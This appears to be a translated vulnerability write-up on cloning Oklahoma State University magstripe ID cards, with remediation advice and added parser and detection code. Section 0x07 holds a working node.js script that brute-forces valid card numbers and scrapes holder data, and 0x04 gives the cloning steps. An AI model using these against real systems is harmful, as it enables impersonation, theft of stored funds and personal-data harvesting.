Hacking Oklahoma State University student ID cards
0x00 basic magnetic stripe knowledge
All content in this article is for study and research purposes only. If you use it for illegal purposes, you alone are responsible for the consequences.
Note: this article deals with magnetic stripe cards, not IC (chip) cards.
A magnetic card is a card-shaped magnetic recording medium: a magnetic carrier records character and numeric data for identification or other purposes. The magnetic stripe is a thin layer of material (also called the pigment) consisting of oriented iron oxide particles bound together with a resin adhesive and bonded to a non-magnetic substrate such as paper or plastic.
Magnetic stripes come in two types: high coercivity (HiCo) and low coercivity (LoCo). HiCo suits cards that are swiped frequently, such as credit cards. LoCo stripes have low coercivity and are cheap to produce, but are more easily erased and have a shorter life.
Coercivity: the strength of the reverse magnetic field needed to bring the magnetization of a magnet, after it has been driven to technical saturation, back to zero.
Readers are generally compatible with both HiCo and LoCo stripes. A HiCo writer can generally write both HiCo and LoCo cards, whereas a LoCo writer can only write LoCo cards. In practice a LoCo stripe is usually light brown, while a HiCo stripe is dark black.
A card carries three tracks; tracks 1 and 2 are the ones commonly used.
Track 1 has two formats: format A, reserved for the card issuer, and format B, laid out as follows:
Start sentinel: 1 character (usually "%")
Format code "B": 1 character (alphabetic only)
Primary account number (PAN): up to 19 characters
Field separator: 1 character (usually "^")
Country code: 3 characters (optional; the OSU card decoded later has none)
Cardholder name: 2 to 26 characters
Field separator: 1 character (usually "^")
Expiration date or field separator: 4 characters (YYMM) or 1 character
Service code: 3 characters
Discretionary data: variable, up to the maximum record length (79 characters); usually holds the PIN verification key indicator (PVKI, 1 character), the PIN verification value (PVV, 4 characters) and the card verification value or code (CVV or CVC, 3 characters)
End sentinel: 1 character (usually "?")
Longitudinal redundancy check (LRC): 1 character
Track 2:
Start sentinel: 1 character (usually ";")
Primary account number (PAN): up to 19 characters
Field separator: 1 character (usually "=")
Expiration date or field separator: 4 characters (YYMM) or 1 character
Service code: 3 characters
Discretionary data: variable, within the maximum record length (40 characters); usually holds the PVKI (1 character), PVV (4 characters) and CVV or CVC (3 characters)
End sentinel: 1 character (usually "?")
Longitudinal redundancy check (LRC): 1 character; used by the reader for internal verification only and not returned on read
Meaning of the service code digits on financial magnetic cards:
First digit:
1: International interchange OK
2: International interchange, use IC (chip) where feasible
5: National interchange only, except under bilateral agreement
6: National interchange only, use IC (chip) where feasible
7: No interchange except under bilateral agreement (closed loop)
9: Test
Second digit:
0: Normal
2: Contact issuer via online means
4: Contact issuer via online means, except under bilateral agreement
Third digit:
0: No restrictions, PIN required
1: No restrictions
2: Goods and services only (no cash)
3: ATM only, PIN required
4: Cash only
5: Goods and services only (no cash), PIN required
6: No restrictions, use PIN where feasible
7: Goods and services only (no cash), use PIN where feasible
0x01 The Oklahoma State University ID card
The Oklahoma State University ID card is the identification card officially issued by the university. It is used for:
Cardholder identification
Access to restricted campus areas
Stored value: the card can be loaded with funds and used for purchases
Authentication to various campus network services (http://it.okstate.edu/services/id)
The card looks like this (photo not reproduced). Note the number in the lower right corner: every card carries a unique 16-digit card number.
0x02 Getting started
First, we noticed that every card number begins with "60383800". Looking at more cards, the next two digits take only three values: "05", "06" and "11".
The remaining six digits appear random, each digit 0 to 9, giving 1 million possible suffixes; combined with the three prefixes, that is about 3 million candidate card numbers.
There is also a page that lets us check whether a card number is valid: https://app.it.okstate.edu/idcard/
Anyone can enter a 16-digit card number on this page and learn whether it is valid.
Querying a valid number shows the card's details; an invalid number shows an error (screenshots not reproduced here).
A query returns the following fields:
Card No.: the number entered
ID card status: valid or invalid
Employment status: the holder's current employment status
Student status: the holder's current enrollment status
Other: remarks and bank card information
The page carries a disclaimer, "IP addresses using this query function will be recorded", intended to deter users from outside the campus. An IP address is trivially hidden behind a proxy, however, so this is no real control.
A USB 3-track magnetic stripe reader for decoding the ID card costs about $25: http://www.rakuten.com/prod/usb-3-track-magnetic-credit-card-reader/240738725.html
Swiping our own student card gives the following:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Against the track layouts above, this breaks down as follows:
Track 1:
% and B (start sentinel, format code), card number 6038380006514029, ^, cardholder name SNELLING/SAMUEL R, ^, expiration date 4912 (December 2049), service code 120, discretionary data (all zeros), ?
Track 2:
; (start sentinel), card number 6038380006514029, =, expiration date 4912 (December 2049), service code 120, discretionary data 0000000000000, ?
The two most interesting points: every card carries the expiration date 49/12, and the discretionary data (where the PIN verification data would be) is empty, padded with zeros.
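As an added example (not code from the original post), here is a parser for the Track 1 format B and Track 2 layouts described in section 0x00, run on the swipe output quoted above. It decodes the service code against the table in 0x00 and flags the zero-filled discretionary data. Two assumptions are built in: two-digit years are taken as 20xx, and the LRC is not checked because the reader strips it before handing over the data.

```javascript
'use strict';
// Added example, not code from the original post: a parser for the ISO/IEC
// 7813 Track 1 (format B) and Track 2 layouts described in section 0x00,
// applied to the swipe output quoted above. Two-digit years are assumed to
// be 20xx; readers strip the LRC, so it is not checked here.

// Swipe output quoted on this page (track 1 followed by track 2).
const SAMPLE_SWIPE =
  '%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?' +
  ';6038380006514029=49121200000000000000?';

// Service-code digit meanings from the table in section 0x00.
const SERVICE_CODE = {
  first: {
    '1': 'international interchange',
    '2': 'international interchange, use IC (chip) where feasible',
    '5': 'national interchange only, except under bilateral agreement',
    '6': 'national interchange only, use IC (chip) where feasible',
    '7': 'no interchange except under bilateral agreement (closed loop)',
    '9': 'test',
  },
  second: {
    '0': 'normal authorization',
    '2': 'contact issuer online',
    '4': 'contact issuer online, except under bilateral agreement',
  },
  third: {
    '0': 'no restrictions, PIN required',
    '1': 'no restrictions',
    '2': 'goods and services only',
    '3': 'ATM only, PIN required',
    '4': 'cash only',
    '5': 'goods and services only, PIN required',
    '6': 'no restrictions, PIN where feasible',
    '7': 'goods and services only, PIN where feasible',
  },
};

function decodeServiceCode(code) {
  if (!/^\d{3}$/.test(code)) throw new Error(`bad service code: ${code}`);
  return {
    interchange: SERVICE_CODE.first[code[0]] || 'reserved',
    authorization: SERVICE_CODE.second[code[1]] || 'reserved',
    restrictions: SERVICE_CODE.third[code[2]] || 'reserved',
  };
}

// Track 1 format B: %B<PAN>^<SURNAME/GIVEN>^<YYMM or ^><service code><discretionary>?
const TRACK1 = /^%B(\d{1,19})\^([^^]{2,26})\^(\d{4}|\^)(\d{3})([^?]*)\?$/;
// Track 2: ;<PAN>=<YYMM or =><service code><discretionary>?
const TRACK2 = /^;(\d{1,19})=(\d{4}|=)(\d{3})(\d*)\?$/;

function parseTrack1(track) {
  const m = TRACK1.exec(track);
  if (!m) throw new Error('track 1 is not format B');
  const [surname, given = ''] = m[2].trim().split('/');
  return {
    pan: m[1],
    name: { surname, given: given.trim() },
    expiry: m[3] === '^' ? null : m[3],
    serviceCode: m[4],
    discretionary: m[5],
  };
}

function parseTrack2(track) {
  const m = TRACK2.exec(track);
  if (!m) throw new Error('track 2 is not ISO 7813');
  return { pan: m[1], expiry: m[2] === '=' ? null : m[2], serviceCode: m[3], discretionary: m[4] };
}

// A reader emits the tracks back to back; split at the first end sentinel.
function parseSwipe(raw) {
  const m = /^(%[^?]*\?)(;[^?]*\?)?$/.exec(raw.trim());
  if (!m) throw new Error('unrecognised swipe data');
  return { track1: parseTrack1(m[1]), track2: m[2] ? parseTrack2(m[2]) : null };
}

function expiryToIso(yymm) { // '4912' -> '2049-12' (20xx century assumed)
  return `20${yymm.slice(0, 2)}-${yymm.slice(2)}`;
}

// If the discretionary field holds no PVV/CVV, the card number alone, read
// from any swipe or guessed, is enough to produce a working clone.
function assessSwipe(raw) {
  const { track1, track2 } = parseSwipe(raw);
  const blank = (s) => /^0*$/.test(s.replace(/ /g, ''));
  const problems = [];
  if (track2 && track1.pan !== track2.pan) problems.push('PAN differs between tracks');
  if (blank(track1.discretionary) && (!track2 || blank(track2.discretionary))) {
    problems.push('discretionary data all zeros: no PVV/CVV, card is cloneable from the PAN alone');
  }
  return {
    pan: track1.pan,
    holder: track1.name,
    expiry: track1.expiry ? expiryToIso(track1.expiry) : null,
    service: decodeServiceCode(track1.serviceCode),
    problems,
  };
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(assessSwipe(SAMPLE_SWIPE), null, 2));
}
```

Run it with node and it reports the PAN, the holder, the 2049-12 expiry, service code 120 decoded as "international interchange / contact issuer online / no restrictions, PIN required", and a single problem: the zero-filled discretionary data. A card whose discretionary field carries a real PVV/CVV produces no problem, which is the property the remediation section later asks for.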
0x03 What we know so far
So far we have the following:
Every member of staff and every student has this ID card.
The first eight digits of every card number are 60383800.
Digits nine and ten take only three values: 05, 06, 11.
That leaves about 3 million possible card numbers.
A ready-made website reports whether a card number is valid; it may log our IP address.
Every card has the same expiration date, 49/12.
The discretionary data on every card is empty (zero-filled).
0x04 Cloning the card
We use the MSRC206 magnetic stripe reader/writer made by Unitech. This commercial-grade unit supports both HiCo and LoCo cards and has an encoder strong enough to overwrite existing HiCo cards.
Next comes the exciting part, copying the card. The steps:
1. Plug in the MSRC206 power supply and connect it to the computer; allow the driver to install.
2. Start the MSRC206 software and wait for it to connect to the device.
3. Click the "Read" button on the right of the window and swipe the source card to capture its encoded data.
4. Click the "Write" button on the right of the window and swipe a blank card to write the data.
Source card data:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Data copied to the blank card:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Data written to a blank card after changing the cardholder name:
%B6038380006514029^PETE/PISTOL ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Comparison:
%B6038380006514029^SNELLING/SAMUEL R ^491212000000000 000 ?;6038380006514029=49121200000000000000?
%B6038380006514029^PETE/PISTOL ^491212000000000 000 ?;6038380006514029=49121200000000000000?
Note: we changed the cardholder's name but left the card number unchanged.
Photo (front): upper left, the copy with the modified name; upper right, the direct copy of the source card; lower left, the source card.
Photo (back):
0x05 Field tests
Our team then tried the cloned cards in various places around campus.
First, one of our senior teammates applied for a new card (officially issued by the school) and used it in the library. The librarian said the ID was not in the system; a newly issued card usually takes several days before the server has synchronized. From this we learned that the library does not check a card against the central server in real time: it pulls new records from the server every few days and stores them locally.
Next, a teammate took the cloned cards around campus; our demo video is at http://youtu.be/Bw2Ugezb7Fs
These tests taught us the following:
Although the copies are plain white cards and look odd, staff still accepted them from our charming teammates. When the cardholder name on a copy was changed, purchase receipts still showed the name of the source card's holder. So the campus sales system checks the card number against the server in real time during a purchase, which guarantees the ID is valid, but the cardholder's name on the stripe is never checked.
0x06 Summary of findings
Putting the experiments together, this is what we know:
Every member of staff and every student has this ID card.
The first eight digits of every card number are 60383800.
Digits nine and ten take only three values: 05, 06, 11.
That leaves about 3 million possible card numbers.
A ready-made website reports whether a card number is valid; it may log our IP address.
Every card has the same expiration date, 49/12.
The discretionary data on every card is empty (zero-filled).
Unitech's MSRC206 can read, edit and re-encode the magnetic stripe.
The library does not check cards against the server in real time, so it cannot tell a white (cloned) card from a genuine one.
Staff accept white cards.
The sales system verifies the card number against the server in real time, but does not verify the cardholder's identity.
0x07 Scaling up
We now have enough to operate at scale.
First we wrote a small node.js script. You have already guessed what it does: it enumerates valid card numbers on campus.
Code:
var cheerio = require('cheerio'),   // npm packages: cheerio (HTML scraping), request (HTTP client)
    request = require('request'),
    fs = require('fs'),
    headnumber = '06';               // one of the three observed prefixes: 05, 06, 11

for (var i = 1; i <= 100; i += 1) {
  // build a random six-digit suffix, each digit 0-9
  var tailnumber = '';
  while (tailnumber.length < 6) {
    tailnumber += Math.floor(Math.random() * 10);
  }
  request.post('https://app.it.okstate.edu/idcard/index.php/module/Default/action/IDCardEntry',
    { form: { card_id: '60383800' + headnumber + tailnumber } },
    function (error, response, html) {
      if (!error && response.statusCode == 200) {
        // scrape the value cell next to each label cell of the result table
        var $ = cheerio.load(html);
        $('td.formText').each(function () {
          var text = $(this).next().text();
          fs.appendFile('osu_ids.txt', text + ';', function (err) {});
        });
        fs.appendFile('osu_ids.txt', '\r\n', function (err) {});
      }
    });
}
Because the discretionary data (PIN verification data) of every ID card is empty (zero-filled), and the server does not verify the cardholder's identity, the valid numbers we harvest can be turned into cloned cards at scale, and those cards used for all manner of mischief.
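The query page's only stated defence is that it logs client IP addresses. As an added example (not code from the original post, and not anything OSU ran), here is what a defender could do with such a log: detection logic for the enumeration script above, run over constructed log lines in a format the lookup page might record. The log format, thresholds and client addresses are assumptions made for this illustration.

```javascript
'use strict';
// Added example, not code from the original post: detection logic for the
// card-number enumeration above, run over constructed log lines in a format
// the ID lookup page might record (timestamp, client IP, card_id, result).
// The log format, thresholds and client addresses are assumptions.

// Build a constructed log: one client guessing card numbers at two lookups a
// second (almost all misses), plus three ordinary users each checking one card.
function makeLogLines() {
  const t0 = Date.parse('2014-03-02T10:00:00Z');
  const lines = [];
  for (let i = 0; i < 60; i++) {
    const suffix = String((i * 16807) % 1000000).padStart(6, '0'); // deterministic "random" guesses
    const result = i % 25 === 0 ? 'valid' : 'invalid';               // a guesser mostly misses
    lines.push(`${new Date(t0 + i * 500).toISOString()} 203.0.113.7 card_id=6038380006${suffix} result=${result}`);
  }
  const users = ['198.51.100.4', '198.51.100.9', '192.0.2.23'];
  users.forEach((ip, k) => {
    lines.push(`${new Date(t0 + 1000 + k * 20000).toISOString()} ${ip} card_id=6038380006514029 result=valid`);
  });
  return lines;
}

const LINE = /^(\S+) (\S+) card_id=(\d{16}) result=(valid|invalid)$/;

function parseLine(line) {
  const m = LINE.exec(line);
  if (!m) return null;
  return { t: Date.parse(m[1]), ip: m[2], cardId: m[3], result: m[4] };
}

// Flag any client that, within one sliding window, made more than maxLookups
// lookups of which at least minInvalidRatio were misses: a legitimate user
// checks the one or two numbers they own, an enumerator checks many and misses.
function detectEnumeration(lines, { windowMs = 60000, maxLookups = 10, minInvalidRatio = 0.5 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const flagged = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.t - b.t);
    let start = 0;
    for (let end = 0; end < events.length; end++) {
      while (events[end].t - events[start].t > windowMs) start++;
      const win = events.slice(start, end + 1);
      const invalid = win.filter((e) => e.result === 'invalid').length;
      if (win.length > maxLookups && invalid / win.length >= minInvalidRatio) {
        flagged.push({ ip, lookups: win.length, invalid, distinctIds: new Set(win.map((e) => e.cardId)).size });
        break; // one alert per client is enough
      }
    }
  }
  return flagged;
}

// Per-client thresholds are defeated by proxy rotation, so also watch the
// site-wide miss rate: a lookup page used only by cardholders should almost
// never be asked about numbers that do not exist.
function invalidRatio(lines) {
  const events = lines.map((l) => parseLine(l)).filter(Boolean);
  const invalid = events.filter((e) => e.result === 'invalid').length;
  return events.length ? invalid / events.length : 0;
}

if (typeof module !== 'undefined' && require.main === module) {
  const log = makeLogLines();
  console.log(detectEnumeration(log), invalidRatio(log).toFixed(2));
}
```

On the constructed log the guessing client is flagged as soon as its eleventh lookup lands in the window (ten of them misses), the three ordinary users are not, and the site-wide miss rate is over 90 percent, which on its own would justify taking the page offline or putting it behind a login, as the remediation section recommends.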
The damage this could do is far worse than most people imagine. Picture a card you have just loaded with money being drained to a fraction of its balance; the library suddenly warning you that 1,000 books checked out in your name have not been returned; two security officers stopping you on a leisurely walk across campus because "you" harassed a girl last night...
0x08 Remediation
The following steps take us away from the scenarios above and back to a peaceful, harmonious campus, though carrying them out is somewhat painful:
Take the card number query site https://app.it.okstate.edu/idcard/ offline.
Redesign the ID card.
Reissue a new card to everyone.
Review and test every system that uses the ID card.
Have every system strictly verify each transaction.
Add a second factor of verification.
Reference: http://en.wikipedia.org/wiki/Magnetic_stripe_card
Original article: http://snelling.io/hacking-oklahoma-state-university-student-id